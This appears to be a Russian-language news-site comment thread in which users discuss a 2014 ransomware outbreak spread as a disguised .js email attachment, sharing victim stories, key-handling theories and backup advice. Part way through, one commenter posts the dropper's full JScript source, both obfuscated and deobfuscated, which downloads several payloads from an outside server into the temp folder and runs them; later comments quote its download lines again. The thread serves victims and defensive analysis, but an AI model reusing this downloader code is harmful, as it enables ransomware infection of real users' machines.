Не верю, что всё так просто) Вот так взяли и на безвозмездной основе выслали и все файлы дешифровались)
25.06.2014 в 15:10
Ггггг!!!!! Я вчера попался!!!! У меня всё зашифровалось!!! Так мне потом сами хакеры выслали дешефратор!!!!!
"Handrey":

А что Вы им такое сделали, что выслали сами?) Бесплатно выслали?
"Полечка":

Вы не поверите, но да, абсолютно без платно. Я им просто в обратный адрес написал, что ребята вы конечно молодцы, но это не справедливо. пожалуйста верните мне всё как было)))) Не серьёзно. и они выслали дешефратор. Я включил его на ночь, а с утра всё было как новенькое)
"Handrey":

А ещё они сказали, что мы впервые сталкиваемся с этим. У них через "пожалуйста" ещё ни кто не просил сделать всё как было. Так вот они в порядке исключения мне и выслали. А ещё сказали, что они против РБ не работают. Белорусские адреса случайно сгенерировались. Вот так-вот...
25.06.2014 в 15:12
Беда. Ипользуйте linux ребята и не будет у вас никаких проблем с потерей данных за 5 лет работы. Уже один такой прецедент заставил бы меня перейти на более безопасную ОС.
"jane_red":

ВСЕ компании в Беларуси и почти все в мире используют продукцию Майкрософт.
А вы предлагаете перейти на Линукс и постоянно возиться с экспортом/импортом разных больших таблиц, текстов и т.п.? ))
"Zzombik":

Нет, энтерпрайз пусть страдает за грехи с windows.
25.06.2014 в 15:12
Atllantis,
По идее, если ключ генерируется рандомом, то он должен храниться где-то в системе, если только разработчик не оставил бэкдор.
"karlson_by":
"karlson_by":

Если бы он хранился в системе, то в чём проблема расшифровать? Или в компании «ВирусБлокАда» не могут элементарно взять ключ и расшифровать? Т.е. если он где-то в системе (ключ), то путь к нему должен быть в коде, если нет, то шифровка получается односторонняя, т.е. расшифровать не получится.
"Atllantis":

Atllantis,
По идее, если ключ генерируется рандомом, то он должен храниться где-то в системе, если только разработчик не оставил бэкдор.
"karlson_by":
"karlson_by":


Тот экземпляр, с которым меня вчера попросили поковыряться, использует асимметричное RSA-шифрование. После отправки пары сгенерированных ключей (открытого и закрытого) создателю вируса, один из пары удаляется через sdelete (Secure Delete) - восстановить и стравить ихнему декриптору уже нельзя. Далее файлы шифруются оставшимся закрытым ключом. Таким образом, расшифровать пользователь уже не может. Но вот создатель расшифровать действительно может: у него есть второй ключ от пары, нужный для расшифровки. Короче, всё печально. Господа, настраивайте бэкапы...
"SoFx00":

Ключ отправляется зашифрованным соединением?
"Atllantis":

А вы хотите перехватить запрос с ключом?
25.06.2014 в 15:12
Я что-то сомневаюсь, что все файлы реально шифруются, слишком это долгий и ресурсоемкий процесс.
"Bile":

"Далее видим:
if ($file.Length -lt "40960"){$size=$file.Length}else{$size="40960"};
[byte[]]$buff = new-object byte[] $size;

Из этого выясняем, что шифруется не весь файл, а только первая его часть если размер файла больше 40кб, если меньше, то весь файл.
Остается узнать UUID компьютера и написать скрипт для дешифровки."

взято отсюда: http://habrahabr.ru/post/168677/
вполне разумно... [censored] заголовок файла с аттрибутами
25.06.2014 в 15:14
Ггггг!!!!! Я вчера попался!!!! У меня всё зашифровалось!!! Так мне потом сами хакеры выслали дешефратор!!!!!
"Handrey":

А что Вы им такое сделали, что выслали сами?) Бесплатно выслали?
"Полечка":

Вы не поверите, но да, абсолютно без платно. Я им просто в обратный адрес написал, что ребята вы конечно молодцы, но это не справедливо. пожалуйста верните мне всё как было)))) Не серьёзно. и они выслали дешефратор. Я включил его на ночь, а с уьра всё было как новенькое)
"Handrey":

Не верю, что всё так просто) Вот так взяли и на безвозмездной основе выслали и все файлы дешифровались)
"Полечка":

Хотите верьте-хотите нет!! Я сам сначала не поверил.
25.06.2014 в 15:15
TraderJohn, я не видел ни текста письма, ни самого скрипта. Нигде на момент написания комментария не было указано, что используется асимметричное шифрование. Интересно, а если ящик закроют?
25.06.2014 в 15:15
Короче у меня есть ДЭШЕФРАТОР Если кому нужно могу скинуть.
25.06.2014 в 15:17
Но я не уверен, что он ко всем подойдёт. На компе есть файл с расширением key помоему.
25.06.2014 в 15:18
Короче у меня есть ДЭШЕФРАТОР Если кому нужно могу скинуть.
"Handrey":

кому он нужен, если файлы дешифруются на основе УНИКАЛЬНЫХ пар открытый-закрытый ключ? слово Дешифратор с двумя ошибками...
25.06.2014 в 15:19
Короче у меня есть ДЭШЕФРАТОР Если кому нужно могу скинуть.
"Handrey":

кому он нужен, если файлы дешифруются на основе УНИКАЛЬНЫХ пар открытый-закрытый ключ? слово Дешифратор с двумя ошибками...
"_TNT_":

))) Я спецом так написал! а по поводу уникальных, то я просто на всякий случай.
25.06.2014 в 15:20
Хотите верьте-хотите нет!! Я сам сначала не поверил.
"Handrey":

Возможно, тот, кто прочел ваше письмо, любит белорусов. Вот и решил помочь)
Если это правда, конечно.
Сама тем временем делаю резервные копии)
25.06.2014 в 15:30
Как раз вчера один из компов попался на такую фишку =)
Закодировали все файлы расширения майкрософт офиса. За ключ на 4000 файлов просят 150 у.е.
25.06.2014 в 15:32
Я что-то сомневаюсь, что все файлы реально шифруются, слишком это долгий и ресурсоемкий процесс.
"Bile":

"Далее видим:
if ($file.Length -lt "40960"){$size=$file.Length}else{$size="40960"};
[byte[]]$buff = new-object byte[] $size;
Из этого выясняем, что шифруется не весь файл, а только первая его часть если размер файла больше 40кб, если меньше, то весь файл.
Остается узнать UUID компьютера и написать скрипт для дешифровки."

взято отсюда: http://habrahabr.ru/post/168677/
вполне разумно... пох**ить заголовок файла с аттрибутами
"_TNT_":

Это я видел, но там старая версия и возможно сейчас сделано по-другому. Единственное интересно, как дешифратор узнает, что ключ является подходящим?
25.06.2014 в 15:35
Это я видел, но там старая версия и возможно сейчас сделано по-другому. Единственное интересно, как дешифратор узнает, что ключ является подходящим?
"Bile":


"7.2. В начале Вам необходимо получить гарантитого, что мы можем расшифровать файлы (бывают редкие случаи, когда уже не можем)
7.2. Структура Вашего письма:
- вложение Вашего ID-файла 'KEY.PRIVATE' (!!!) - поищите его на компьютере, без него восстановление невозможно
- 1-2 зашифрованных файла для проверки возможности расшифровки"

ну как-то так...
25.06.2014 в 15:50
Это я видел, но там старая версия и возможно сейчас сделано по-другому. Единственное интересно, как дешифратор узнает, что ключ является подходящим?
"Bile":


"7.2. В начале Вам необходимо получить гарантитого, что мы можем расшифровать файлы (бывают редкие случаи, когда уже не можем)
7.2. Структура Вашего письма:
- вложение Вашего ID-файла 'KEY.PRIVATE' (!!!) - поищите его на компьютере, без него восстановление невозможно
- 1-2 зашифрованных файла для проверки возможности расшифровки"

ну как-то так...
"_TNT_":

Пишут, что в новой версии 'KEY.PRIVATE' отсылать уже не нужно.
25.06.2014 в 15:53
[censored]
25.06.2014 в 16:12
Ключ шифра после шифрования высылается злоумышленнику на почту.
Скрипт для изучения
...
"1Bonya":

Очевидно, мне не тот вирус дали. :)
Тот, что у меня, сразу загружает все данные во временную папку на компе, после выполняет шифровку файлов... Судя по всему, файл расшифровки так же загружается на комп. Да и, что-то я как не пытался запустить его, он не работает. Похоже сервак ихний прикрыли.
Вот исходник:
function CreateObject(a){return new ActiveXObject(a)}function DWNDCRYPTO(a,b){b=WshShell.ExpandEnvironmentStrings(b);var c=WScript.CreateObject(_0x7449[3]);c[_0x7449[5]](_0x7449[4],a,!1);c[_0x7449[6]](null);var d=CreateObject(_0x7449[7]+_0x7449[8]);with(d)return Mode=3,Type=1,Open(),Write(c[_0x7449[9]]),SaveToFile(b,1),Close(),b}function Run(a){WshShell.Run(a,0,0)}
var _0x7449='%TEMP%\\ WScript.Shell Scripting.FileSystemObject Msxml2.XMLhttp GET open send ADO DB.Stream responseBody http://krasnikov.tw1.ru/document %TEMP%\\document.doc " document.doc" http://krasnikov.tw1.ru/cde %TEMP%\\cde.cmd http://krasnikov.tw1.ru/svchost %TEMP%\\svchost.cry http://krasnikov.tw1.ru/iconv %TEMP%\\iconv.dll http://krasnikov.tw1.ru/genkey %TEMP%\\genkey.cry http://krasnikov.tw1.ru/secrypt %TEMP%\\secrypt.cry http://krasnikov.tw1.ru/paycrypt %TEMP%\\paycrypt.cry cde.cmd" http://krasnikov.tw1.ru/DECODE %TEMP%\\DECODE.zip http://krasnikov.tw1.ru/javav %TEMP%\\javav.cry http://krasnikov.tw1.ru/input1 %TEMP%\\input1.cry http://krasnikov.tw1.ru/input2 %TEMP%\\input2.cry'.split(" "),DestinationFLE=
_0x7449[0],WshShell=CreateObject(_0x7449[1]),FSO=fso=CreateObject(_0x7449[2]);DWNDCRYPTO(_0x7449[10],_0x7449[11]);try{Run(_0x7449[12]+DestinationFLE+_0x7449[13])}catch(e$$14){}DWNDCRYPTO(_0x7449[14],_0x7449[15]);DWNDCRYPTO(_0x7449[16],_0x7449[17]);DWNDCRYPTO(_0x7449[18],_0x7449[19]);DWNDCRYPTO(_0x7449[20],_0x7449[21]);DWNDCRYPTO(_0x7449[22],_0x7449[23]);DWNDCRYPTO(_0x7449[24],_0x7449[25]);Run(_0x7449[12]+DestinationFLE+_0x7449[26]);DWNDCRYPTO(_0x7449[27],_0x7449[28]);DWNDCRYPTO(_0x7449[29],_0x7449[30]);
DWNDCRYPTO(_0x7449[31],_0x7449[32]);DWNDCRYPTO(_0x7449[33],_0x7449[34]);


А вот, то же, но в более читабельном формате: :)
function CreateObject(a){
return new ActiveXObject(a)
}

function DWNDCRYPTO(a,b){
b=WshShell.ExpandEnvironmentStrings(b);
var c=WScript.CreateObject('Msxml2.XMLhttp');
c.open('GET',a,!1);
c.send(null);
var d=CreateObject('ADODB.Stream');
with(d)
return Mode=3,Type=1,Open(),Write(c.responseBody),SaveToFile(b,1),Close(),b;
}
function Run(a){
WshShell.Run(a,0,0)
}

WshShell=CreateObject('WScript.Shell'),
FSO=fso=CreateObject('Scripting.FileSystemObject');

DWNDCRYPTO('http://krasnikov.tw1.ru/document','%TEMP%\\document.doc');

try{
Run('"%TEMP%\\document.doc"');
} catch(e$$14){}

DWNDCRYPTO('http://krasnikov.tw1.ru/cde','%TEMP%\\cde.cmd');
DWNDCRYPTO('http://krasnikov.tw1.ru/svchost','%TEMP%\\svchost.cry');
DWNDCRYPTO('http://krasnikov.tw1.ru/iconv','%TEMP%\\iconv.dll');
DWNDCRYPTO('http://krasnikov.tw1.ru/genkey','%TEMP%\\genkey.cry');
DWNDCRYPTO('http://krasnikov.tw1.ru/secrypt','%TEMP%\\secrypt.cry');
DWNDCRYPTO('http://krasnikov.tw1.ru/paycrypt','%TEMP%\\paycrypt.cry');

Run('"%TEMP%\\cde.cmd"');

DWNDCRYPTO('http://krasnikov.tw1.ru/DECODE','%TEMP%\\DECODE.zip');
DWNDCRYPTO('http://krasnikov.tw1.ru/javav','%TEMP%\\javav.cry');
DWNDCRYPTO('http://krasnikov.tw1.ru/input1','%TEMP%\\input1.cry');
DWNDCRYPTO('http://krasnikov.tw1.ru/input2','%TEMP%\\input2.cry');


P.S. Данный вирус любезно предоставлен "Mercury_78".

UPD: Защита от данного вируса простая, отключить интернет перед запуском файла и всё, он ничего не сможет сделать :)
25.06.2014 в 16:12
Переходите на Linux, никаких вирусов и геммора)))
25.06.2014 в 16:17

Очевидно, мне не тот вирус дали. :)
"Atllantis":


По крайней мере, текстовый файл, выложенный выше, совпал до буквы.
25.06.2014 в 16:17
Все, какой-то студент 3 курса бгуир узнал про алгоритмы шифрования - и приплыли... смотрю что реально "эпидемия" в комментах...
25.06.2014 в 16:34
а это случаем не для его касперский де активатор сделал?
Или это новый?
25.06.2014 в 16:35
У меня знакомый в России, уже словил такую штуку. В итоге отдал 120Евро. После чего через несколько часов всё восстановилось. Так же вредители высылают инструкции как не попасть на эту штуку ещё раз!!!
25.06.2014 в 16:38
Было как-то в новостях, мелькало по крайней мере про святой дух. http://tech.onliner.by/2014/01/14/spiritus-sanctus

А вот в комментариях была занятная ссылка http://habrahabr.ru/post/159811/. То что там написано в посте на хабре я в принципе не осилю, не то что за 72часа, на это месяцы а то и годы жизни моей уйдут. ПС, а в комментариях автору еще тысячу вариантов набросили
Это вам и вправду не пиратку за 150К накатывать, это высокие материи. Смешно читать когда предлагают хост почистить и все прям заработает.

Я так понимаю что только бэкап, как минимум базы 1с, поможет не совсем попасть
25.06.2014 в 16:51
вот Нубы...)
25.06.2014 в 17:10
Sadren11, РОБИН ГУтЫ !!!!!!! Еще и советы дают.Своего рода профилактика. Ликбез, для неучей.
25.06.2014 в 17:13
Какие хосты, какие заглушки? Вы, дыбилы, читать не умеете? Вирус шифрует файло локально и на шарах. Если еще не делаете бэкапы, то самое время начать. Зашифруют вам базу 1Сочную, что Вы делать будете? Заявление писать по собственному?
"karlson_by":

Спасибо, сэкономили ресурс моей механической клавиатуры.
25.06.2014 в 17:21
[censored]
25.06.2014 в 17:23
[censored]
25.06.2014 в 17:28
[censored]
25.06.2014 в 17:28
[censored]
25.06.2014 в 17:28
Atllantis, я так понимаю и ограничение прав пользователей на создание файлов и папок на системном диске тоже поможет т.к. прямой запуск скрипта из вложений в почте происходит на диске C по умолчанию. (если конечно не запускать с другого диска).
25.06.2014 в 17:31
[censored]
25.06.2014 в 17:36
Atllantis, я так понимаю и ограничение прав пользователей на создание файлов и папок на системном диске тоже поможет т.к. прямой запуск скрипта из вложений в почте происходит на диске C по умолчанию. (если конечно не запускать с другого диска).
"Bile":

Наврятли, хотя может и поможет.
Тут главное запустить скрипт, дальше он загрузит вирус с сервера (во временную папку) и выполнит его.
НО, я не совсем понимаю как запускается данный скрипт, т.е. файл имеет расширение *.js, каким образом он запускается из под Windows? Если его открыть, то он просто откроется как текстовый файл... JS не является исполняемым файлом. Либо я чё-то не понимаю? :)
25.06.2014 в 17:46
Если его открыть, то он просто откроется как текстовый файл... JS не является исполняемым файлом. Либо я чё-то не понимаю? :)
"Atllantis":

DWNDCRYPTO('http://krasnikov.tw1.ru/cde','%TEMP%\\cde.cmd');
DWNDCRYPTO('http://krasnikov.tw1.ru/svchost','%TEMP%\\svchost.cry');
DWNDCRYPTO('http://krasnikov.tw1.ru/iconv','%TEMP%\\iconv.dll');
DWNDCRYPTO('http://krasnikov.tw1.ru/genkey','%TEMP%\\genkey.cry');
DWNDCRYPTO('http://krasnikov.tw1.ru/secrypt','%TEMP%\\secrypt.cry');
DWNDCRYPTO('http://krasnikov.tw1.ru/paycrypt','%TEMP%\\paycrypt.cry');
Run('"%TEMP%\\cde.cmd"');

У тебя тут написано, что загружает 6 файлов во временную папку и исполняет файл "cde.cmd".
Тут главное запустить скрипт, дальше он загрузит вирус с сервера (во временную папку) и выполнит его.
Atllantis:

Он не сможет создать временную папку, закачать туда файлы и запустить исполняемый файл если отсутствуют права на запись.
25.06.2014 в 17:47
DWNDCRYPTO('http://krasnikov.tw1.ru/cde','%TEMP%\\cde.cmd');
DWNDCRYPTO('http://krasnikov.tw1.ru/svchost','%TEMP%\\svchost.cry');
DWNDCRYPTO('http://krasnikov.tw1.ru/iconv','%TEMP%\\iconv.dll');
DWNDCRYPTO('http://krasnikov.tw1.ru/genkey','%TEMP%\\genkey.cry');
DWNDCRYPTO('http://krasnikov.tw1.ru/secrypt','%TEMP%\\secrypt.cry');
DWNDCRYPTO('http://krasnikov.tw1.ru/paycrypt','%TEMP%\\paycrypt.cry');
Run('"%TEMP%\\cde.cmd"');
"Bile":

И? К чему этот коммент?

UPD:
У тебя тут написано, что загружает 6 файлов во временную папку и исполняет файл "cde.cmd".
"Bile":

Я в курсе, что он (код) делает.

Мой вопрос был не о том как работает код в файле, а о том, как выполнить (запустить) данный файл!

UPD2:
Тут главное запустить скрипт, дальше он загрузит вирус с сервера (во временную папку) и выполнит его.
Atllantis:

Он не сможет создать временную папку, закачать туда файлы и запустить исполняемый файл если отсутствуют права на запись.
"Bile":

Он и не создаёт временную папку, он использует стандартную временную папку Windows, куда загружает вирус и после его выполняет.
P.S. что бы использовать временную папку, права на запись не нужны (они предоставляются по умолчанию), а вот в любой другой папке, на диске с виндой, права уже нужно будет предоставить.
25.06.2014 в 17:55
Я в курсе, что он (код) делает.
Мой вопрос был не о том как работает код в файле, а о том, как выполнить (запустить) данный файл!
"Atllantis":

http://www.cyberforum.ru/javascript/thread97483.html ты об этом спрашивал? Я же так понимаю, что там не только один .js файл? Или один?
Он и не создаёт временную папку, он использует стандартную временную папку Windows, куда загружает вирус и после его выполняет.
"Atllantis":

А, да, не заметил, что не создает папку, а использует стандартную.
25.06.2014 в 18:02
backup тоже зашифрует :) - так что пишем на DVD.
25.06.2014 в 18:02
http://www.cyberforum.ru/javascript/thread97483.html ты об этом спрашивал?
"Bile":

тут какой-то бред (т.е. совершенно не по теме).

Поясню подробнее... Вот есть любая программа, запускается файлом с расширением *.exe
Все файлы с данным расширением в винде являются исполняемыми, т.е. они запускаются и выполняются.
Если же ты запустишь "вирус", ты просто (например) откроешь его у себя в блокноте, но он не будет выполнен. Так вот я и спрашиваю, каким образом данный файл выполняется?

Что делает обычный пользователь? Открыл архив с файлом, нажал на нём 2 раза и...
1. Будет предложено выбрать программу, с помощью которой открыть данный файл (обычно выбирают блокнот).
2. Файл откроется в блокноте.
...и опять же, он будет открыт как обычный текстовый файл.

UPD:
Я же так понимаю, что там не только один .js файл? Или один?
"Bile":

Один js файл и всё. Название файла (не знаю зачем, но пусть будет :) ): "Письмо-приглашение на участие в Тендере на поставку Медицинского оборудования- до 28.06.2014 - на подачу менеджер Департамента маркетинга и рекламы _mail_attachment_DrWeb.Scanned.OK.dос .js".
25.06.2014 в 18:04
http://www.cyberforum.ru/javascript/thread97483.html ты об этом спрашивал?
"Bile":

тут какой-то бред (т.е. совершенно не по теме).

Поясню подробнее... Вот есть любая программа, запускается файлом с расширением *.exe
Все файлы с данным расширением в винде являются исполняемыми, т.е. они запускаются и выполняются.
Если же ты запустишь "вирус", ты просто (например) откроешь его у себя в блокноте, но он не будет выполнен. Так вот я и спрашиваю, каким образом данный файл выполняется?

Что делает обычный пользователь? Открыл архив с файлом, нажал на нём 2 раза и...
1. Будет предложено выбрать программу, с помощью которой открыть данный файл (обычно выбирают блокнот).
2. Файл откроется в блокноте.
...и опять же, он будет открыт как обычный текстовый файл.
"Atllantis":

Я понимаю. Я просто структуру вируса не видел. Там только один .js файл? Я думаю, там есть исполняемый файл, который через командную строку выпоняет .js скрипт.
25.06.2014 в 18:09
http://www.cyberforum.ru/javascript/thread97483.html ты об этом спрашивал?
"Bile":

тут какой-то бред (т.е. совершенно не по теме).

Поясню подробнее... Вот есть любая программа, запускается файлом с расширением *.exe
Все файлы с данным расширением в винде являются исполняемыми, т.е. они запускаются и выполняются.
Если же ты запустишь "вирус", ты просто (например) откроешь его у себя в блокноте, но он не будет выполнен. Так вот я и спрашиваю, каким образом данный файл выполняется?

Что делает обычный пользователь? Открыл архив с файлом, нажал на нём 2 раза и...
1. Будет предложено выбрать программу, с помощью которой открыть данный файл (обычно выбирают блокнот).
2. Файл откроется в блокноте.
...и опять же, он будет открыт как обычный текстовый файл.
"Atllantis":

Я понимаю. Я просто структуру вируса не видел. Там только один .js файл? Я думаю, там есть исполняемый файл, который через командную строку выпоняет .js скрипт.
"Bile":

исполняемый файл подгружается во время выполнения js файла и после он запускается. Да, там только 1 файл.
25.06.2014 в 18:15
windows/drivers/system/system32/etc . находим файл host, открывает через блокнот и чистим содержимое. проблема с большинством таких программ, полученых в порнухе или соц. сетях будет устранена..
"IlyaSiliwonik":

хахахахах очередной недо юзер))) сам ловил один раз такую фишку(реферат качал) блокирует рабочий стол так что открыть что либо вы не сможете так как сразу при загрузке компа выбивает заставку и все ) *** короче спасла установка новой винды
25.06.2014 в 18:36
а это случаем не для его касперский де активатор сделал?
Или это новый?
"Leaga":

А разве касперский вообще что-то может сделать? О_0
25.06.2014 в 18:38
[censored]
25.06.2014 в 18:38
http://www.cyberforum.ru/javascript/thread97483.html ты об этом спрашивал?
"Bile":

тут какой-то бред (т.е. совершенно не по теме).

Поясню подробнее... Вот есть любая программа, запускается файлом с расширением *.exe
Все файлы с данным расширением в винде являются исполняемыми, т.е. они запускаются и выполняются.
Если же ты запустишь "вирус", ты просто (например) откроешь его у себя в блокноте, но он не будет выполнен. Так вот я и спрашиваю, каким образом данный файл выполняется?

Что делает обычный пользователь? Открыл архив с файлом, нажал на нём 2 раза и...
1. Будет предложено выбрать программу, с помощью которой открыть данный файл (обычно выбирают блокнот).
2. Файл откроется в блокноте.
...и опять же, он будет открыт как обычный текстовый файл.
"Atllantis":

Я понимаю. Я просто структуру вируса не видел. Там только один .js файл? Я думаю, там есть исполняемый файл, который через командную строку выпоняет .js скрипт.
"Bile":

исполняемый файл подгружается во время выполнения js файла и после он запускается. Да, там только 1 файл.
"Atllantis":

.Js это тоже исполняемый файл. Как файл .cmd или .bat. По умолчанию открывается с помощью интерпретатора скриптов Windows и автоматически выполняется.
25.06.2014 в 18:40
windows/drivers/system/system32/etc . находим файл host, открывает через блокнот и чистим содержимое. проблема с большинством таких программ, полученых в порнухе или соц. сетях будет устранена..
"IlyaSiliwonik":

хахахахах очередной недо юзер))) сам ловил один раз такую фишку(реферат качал) блокирует рабочий стол так что открыть что либо вы не сможете так как сразу при загрузке компа выбивает заставку и все ) *** короче спасла установка новой винды
"danila1991":

Учите лучше, а не качайте рефераты.
25.06.2014 в 18:41
del
25.06.2014 в 18:41
а это случаем не для его касперский де активатор сделал?
Или это новый?
"Leaga":

А разве касперский вообще что-то может сделать? О_0
"Яичко":

Может! Выполнить .js скрипт. :)
25.06.2014 в 18:42
.Js это тоже исполняемый файл. Как файл .cmd или .bat.
"s-lexer":

js не исполняемый файл.
25.06.2014 в 18:47
смысл идти жаловаться если вся ФС накрылась?
никого не жалко
25.06.2014 в 18:50
Atllantis, а если просто дважды кликнуть на нём? запустится WSH?
25.06.2014 в 18:52
.Js это тоже исполняемый файл. Как файл .cmd или .bat.
"s-lexer":

js не исполняемый файл.
"Atllantis":

Окей.
JavaScript — прототипно-ориентированный сценарный язык программирования. Является диалектом языка ECMAScript звучит лучше и понятней.

Да и вообще:


Синтаксис JScript во многом похож на язык JavaScript. Так же используется при создании вэб-страниц ASP. Относится к разделу Исполняемые файлы.

Описание файла .js : Исполняемый скрипт JScript

Исходя из этого можно грубо назвать его исполняемым. Что-бы понятней было.
Если вам больше нечего комментировать - помогайте людям. Подымайте планку познания. Расскажите что такое JS, почему он выполняется и прочее.
25.06.2014 в 18:55
Atllantis, а если просто дважды кликнуть на нём? запустится WSH?
"TONIK_SER":

Нет. По умолчанию, будет предложено выбрать программу с помощью которой можно открыть данный файл (и WSH в списке не будет, но его можно выбрать, указав конкретно расположение исполняемого файла WSH, согласитесь, никто этого делать не будет, к тому же обычный пользователь да же не знает что такое есть и где он находится).
25.06.2014 в 18:55
Как пропатчить KDE2 под FreeBSD?
25.06.2014 в 18:57
хахахахах очередной недо юзер))) сам ловил один раз такую фишку(реферат качал) блокирует рабочий стол так что открыть что либо вы не сможете так как сразу при загрузке компа выбивает заставку и все ) *** короче спасла установка новой винды
"danila1991":

F8 - Save Mode with command prompt пробовали?
25.06.2014 в 18:57
.Js это тоже исполняемый файл. Как файл .cmd или .bat.
"s-lexer":

js не исполняемый файл.
"Atllantis":

Окей.
JavaScript — прототипно-ориентированный сценарный язык программирования. Является диалектом языка ECMAScript звучит лучше и понятней.

Да и вообще:


Синтаксис JScript во многом похож на язык JavaScript. Так же используется при создании вэб-страниц ASP. Относится к разделу Исполняемые файлы.

Описание файла .js : Исполняемый скрипт JScript

Исходя из этого можно грубо назвать его исполняемым. Что-бы понятней было.
Если вам больше нечего комментировать - помогайте людям. Подымайте планку познания. Расскажите что такое JS, почему он выполняется и прочее.
"s-lexer":

Немного не так выразился, я имел ввиду, что он по умолчанию не выполнится, как например файл с расширением .cmd или .bat, .exe и т.п.
25.06.2014 в 19:04
ннда, у меня комп даже с правами администратора не даст ничего скопировать на диск с про что-то запустить я просто молчу, даже при запуске диспетчера спрашивает можно ли его запустить
25.06.2014 в 19:56
.Js это тоже исполняемый файл. Как файл .cmd или .bat.
"s-lexer":

js не исполняемый файл.
"Atllantis":

Окей.
JavaScript — прототипно-ориентированный сценарный язык программирования. Является диалектом языка ECMAScript звучит лучше и понятней.

Да и вообще:


Синтаксис JScript во многом похож на язык JavaScript. Так же используется при создании вэб-страниц ASP. Относится к разделу Исполняемые файлы.

Описание файла .js : Исполняемый скрипт JScript

Исходя из этого можно грубо назвать его исполняемым. Что-бы понятней было.
Если вам больше нечего комментировать - помогайте людям. Подымайте планку познания. Расскажите что такое JS, почему он выполняется и прочее.
"s-lexer":

Немного не так выразился, я имел ввиду, что он по умолчанию не выполнится, как например файл с расширением .cmd или .bat, .exe и т.п.
"Atllantis":


js выполнился на ура, поверьте((
25.06.2014 в 21:07
Блин и я попался(( Письмо пришло от имени существующей белфирмы.
25.06.2014 в 21:13
karlson_by, Два сервака приносили с такой фигней за месяц, ситуация - крах, моря мата, слез, а помочь нечем, кстати каспер пропустил!
25.06.2014 в 21:20
.Js это тоже исполняемый файл. Как файл .cmd или .bat.
"s-lexer":

js не исполняемый файл.
"Atllantis":

Окей.
JavaScript — прототипно-ориентированный сценарный язык программирования. Является диалектом языка ECMAScript звучит лучше и понятней.

Да и вообще:


Синтаксис JScript во многом похож на язык JavaScript. Так же используется при создании вэб-страниц ASP. Относится к разделу Исполняемые файлы.

Описание файла .js : Исполняемый скрипт JScript

Исходя из этого можно грубо назвать его исполняемым. Что-бы понятней было.
Если вам больше нечего комментировать - помогайте людям. Подымайте планку познания. Расскажите что такое JS, почему он выполняется и прочее.
"s-lexer":

Немного не так выразился, я имел ввиду, что он по умолчанию не выполнится, как например файл с расширением .cmd или .bat, .exe и т.п.
"Atllantis":


js выполнился на ура, поверьте((
"alexbtl":

Блин, и правда выполняется по умолчанию в xp на виртуалке.
А у меня на 8.1 по умолчанию предлагает выбрать программу для открытия.
25.06.2014 в 21:37
Блин, и правда выполняется по умолчанию в xp на виртуалке.
А у меня на 8.1 по умолчанию предлагает выбрать программу для открытия.
"Atllantis":

Ух ты, даже не знал. У меня вообще аутлук блокирует передаваемые по почте js файлы.
25.06.2014 в 21:38
Все нормально, порнуху мою не шифранут. А остальное не ценное
25.06.2014 в 21:47
Хорошо то как на MAC OS работать и не париться такими проблемами...
"Теро":

пора переставлять win : rm -rf ~/wine ))
25.06.2014 в 21:59
сделал групповое переименование файлов, которым было добавлено непонятное расширение,затем проверил комп CureIt'ом, штатным KIS'ом.
"Mercury_78":

И что? Так просто? Получается что все, напрасно тут панику разводят? А там, лошары сидят и вирусы пишут?
25.06.2014 в 22:05
В качестве превентивных мер начни с повседневной работы в винде под юзером с ограниченными правами, а не под админом — признай уже, ты никакой не профессионал и не спец в компах и уследить за всем всё равно не сможешь, да и админские права каждый день ни к чему. Кажущееся неудобство — глупость, кроме того, виста и семёрка практически на любое действие, требующее повышенных прав, научились запрашивать логин/пароль админа.
25.06.2014 в 22:59
Сегодня попался на тот-же вирус, и тоже базы 1С, насчёт баз, у меня 8 стоит, зашифровал файл с расширением .cd вернул старое имя пропустил через проверку (в 8 есть такая утилита она лежит в папке самой восьмёрки) заработало. Ещё куча файлов папке пошифравало, восстановил с бэкапов. Пока не вьехал в суть проблемы, заражён сервак? Или всё таки где-то в локалке комп какой-то, вирус вроде сканит шары по сети и их шифрует, у меня проблемы только именно в шарах. Пока гугление результата не дало кроме вот этого треда http://virusinfo.info/showthread.php?t=162034&goto=nextnewest, завтра буду продолжать. Предлагаю для лучшего результата обмениваться опытом тут в комментах. Кстати вёл переписку по адресу который sulybaka@yahoo.com с двух эл.ящиков. С одного зарядил 1 биткоин, для другого 5000 тыщ россии. И отправлял ему файл на расшифровку для проверки, в ответ всё пришло в нормальном виде.
25.06.2014 в 23:18
интересно, а на убунте тоже сработает...
Можно попробовать поставить AVG на вин, этот черт у меня спрашивает разрешение на выполз в интернет у каждого процесса, даже тогда, когда гугл хром пытается тупо обновится, так что думаю при запуске js так же спросил бы разрешить ли выкачивать килабайты, хотя и не факт конечно.
25.06.2014 в 23:45
Пользуйтесь VBA и вы обязательно на свое опыте узнаете о всех существующих вирусах.
26.06.2014 в 0:14
сделал групповое переименование файлов, которым было добавлено непонятное расширение,затем проверил комп CureIt'ом, штатным KIS'ом.
"Mercury_78":

И что? Так просто? Получается что все, напрасно тут панику разводят? А там, лошары сидят и вирусы пишут?
"sit_79":

Не знаю. Я не программер, а юзеро-ламер. Как только мне сказали, что на компе творится фигня - первым делом вырубил от него инет. Вполне возможно, что просто таким образом исключил возможность для скрипта закачать вирус. А то, что у файлов на компе поменялось расширение, так может это работа самого скрипта, а не вируса, который на комп (судя по всему) не попал. А обратно поменять расширение у сотни-другой файлов - 30 секунд...
26.06.2014 в 0:41
vpn , и не посещать сайты "СКАЧАТЬ МАКСА КОРЖА БЕСПЛАТНО ОНЛАЙН БЕЗ СМС ! " . И не что вашему гаджету не угрожает ! , ну конечно же ничто это преувеличил , но хакеры из нашей страны это 1ООО,1 % гарант !
26.06.2014 в 1:00
сделал групповое переименование файлов, которым было добавлено непонятное расширение,затем проверил комп CureIt'ом, штатным KIS'ом.
"Mercury_78":

И что? Так просто? Получается что все, напрасно тут панику разводят? А там, лошары сидят и вирусы пишут?
"sit_79":

Не знаю. Я не программер, а юзеро-ламер. Как только мне сказали, что на компе творится фигня - первым делом вырубил от него инет. Вполне возможно, что просто таким образом исключил возможность для скрипта закачать вирус. А то, что у файлов на компе поменялось расширение, так может это работа самого скрипта, а не вируса, который на комп (судя по всему) не попал. А обратно поменять расширение у сотни-другой файлов - 30 секунд...
"Mercury_78":

Бред!
Сам скрипт ничего не делает вредного. Он только загружает вирус и после запускает его. Всё!
А уже запущенный вирус, шифрует файлы и меняет расширения файлов. Простым переименованием тут не отделаешься.
26.06.2014 в 2:52
Надо брать ещё комп для работы.
И в интернет на нём раз в месяц обновить антивирус.
26.06.2014 в 5:49
Хорошо то как на MAC OS работать и не париться такими проблемами...
"Теро":

зато других хватает
